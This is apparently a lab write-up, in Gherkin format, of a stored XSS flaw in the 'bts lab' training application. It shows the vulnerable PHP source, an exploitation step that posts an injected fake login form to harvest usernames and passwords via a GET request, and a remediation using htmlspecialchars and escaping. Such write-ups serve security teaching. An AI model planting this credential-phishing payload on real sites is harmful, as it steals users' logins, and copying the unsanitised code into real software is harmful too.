## Version 1.4.1
## language: en

Feature:
  TOE:
    bts lab
  Category:
    Stored XSS (Persistent)
  Location:
    http://localhost/btslab/vulnerability/forum.php message (field)
    http://localhost/btslab/vulnerability/ForumPosts.php content (text)
  CWE:
    CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web
    Page (Basic XSS)
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Stored fake login and get username and password
  Recommendation:
    Escape the HTML entry or avoid saving HTML tags

  Background:
  Hacker's software:
    | <Software name>|    <Version>    |
    | Chromer        | 76.0.3809.132   |
    | Windows        | 10.0.1809 (x64) |
  TOE information:
    Given I am accessing the site http://localhost/btslab/
    And the server is running MariaDB version 10.1.36
    And PHP version 5.6.38
    And Apache version 2.4.34
    And is running on Windows 10 with XAMPP 5.6

  Scenario: Normal use case
    Given I am have access to http://localhost/btslab/vulnerability/forum.php
    And I notice that I can post any message as anonymously

  Scenario: Static detection
    Given ToE source code
    When I inspect 'vulnerability/forum.php'
    Then I see the HTML input vulnerability is being caused by lines 34 to 47
    """
    34    if(isset($_POST['post']))
    35    {
    36    $content=$_POST['content'];
    37    $title=$_POST['title'];
    38    if(isset($_SESSION['isLoggedIn']))
    39    {
    40        $user=$_SESSION['username'];
    41    }
    42    else
    43    {
    44        $user="Anonymous";
    45    }
    46    mysql_query("INSERT into posts(content,title,user) values
    ('$content','$title','$user')") or die("Failed to post ".mysql_error());
    47    }
    """
    And I notice that post content is saved directly without filters
    When I inspect 'vulnerability/ForumPosts.php'
    Then I see the HTML output vulnerability is being caused by lines 17 to 30
    """
    17    while($row=mysql_fetch_array($result))
    18    {
    19    echo "<B style='font-size:22px'>Title: ".$row['title']."</B>";
    20    if(isset($_SESSION['isLoggedIn']))
    21    {
    22        if($row['user']==$_SESSION['username'])
    23        {
    24            echo "  <a href='ForumPosts.php?delete=".$row['postid']."'>
                  Delete</a>";
    25        }
    26    }
    27    echo "<br/>-  Posted By ".$row['user'];
    28    echo "<br/><br/>Content:<br/>".$row['content']."";
    29
    30    }
    """
    And I notice that post content is output directly without filters

  Scenario: Dynamic detection
    Given I can create a post in forum page anonymously
    When I write the next HTML code as message
    """
    <h1>HTML code</h1>
    """
    Then I visit the new post [evidence](evidence3.png)
    Then I can conclude that web page don't filter HTML tags

  Scenario: Exploitation
    Given I can create a post anonymously
    And I notice the web does't filter HTML
    Then I write a random tittle and the next message
    """
    <h1>Login first </h1>
    <div id="Main">
    <form action="fake_collects_requests" method="get">
    <table>
        <tbody>
        <tr>
            <td>UserName: </td><td><input type="text" name="username"></td>
        </tr>
        <tr>
        <td>
            Password :</td><td><input type="password" name="password"></td>
        </tr>
        <tr><td><input type="submit" name="Login" value="Login"></td></tr>
    </tbody></table>
    </form>

    <span style="color:red"></span>
    </div>
    """
    And I send the post
    Then I visit the new post
    And I write username and password
    And this send a get request to fake collect requests
    """
    localhost/btslab/vulnerability/fake_collects_requests?username=test&password
    =test&Login=Login
    """
    And I conclude that the fake login was successful
    Then I capture username and password

  Scenario: Remediation
    Given I have patched the HTML input vulnerability using php functions
    """
    mysql_real_escape_string(textToScape)
    htmlspecialchars(textToConvertInHTMLEntities)
    """
    Then I add 46 and 47 line as seen:
    """
    34    if(isset($_POST['post']))
    35    {
    36    $content=htmlspecialchars($_POST['content']);
    37    $title=htmlspecialchars($_POST['title']);
    38    if(isset($_SESSION['isLoggedIn']))
    39    {
    40         $user=$_SESSION['username'];
    41    }
    42    else
    43    {
    44        $user="Anonymous";
    45    }
    46    $content=mysql_real_escape_string($content);
    47    $title=mysql_real_escape_string($title);
    48    mysql_query("INSERT into posts(content,title,user) values
          ('$content','$title','$user')") or die("Failed to post "
          .mysql_error());
    49    }
    """
    Then I have patched the HTML output vulnerability with php function
    And  I use "htmlentities" php function
    """
    17    while($row=mysql_fetch_array($result))
    18    {
    19    $row['title'] = htmlspecialchars($row['title']);
    20    echo "<B style='font-size:22px'>Title: ".$row['title']."</B>";
    21    if(isset($_SESSION['isLoggedIn']))
    22    {
    23        if($row['user']==$_SESSION['username'])
    24        {
    25            echo "  <a href='ForumPosts.php?delete=".$row['postid']."'>
                  Delete</a>";
    26        }
    27    }
    28    $row['content'] = htmlspecialchars($row['content']);
    29    echo "<br/>-  Posted By ".$row['user'];
    30    echo "<br/><br/>Content:<br/>".$row['content']."";
    31
    32    }
    """
    And I can confirm that the vulnerability was successfully patched
    Then as show [evidence](evidence6.png)

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.4/10 (medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.8/10 (medium) - E:F/RL:O/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    4.1/10 (medium) - CR:L/IR:L/AR:L/MAV:X/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-08-30
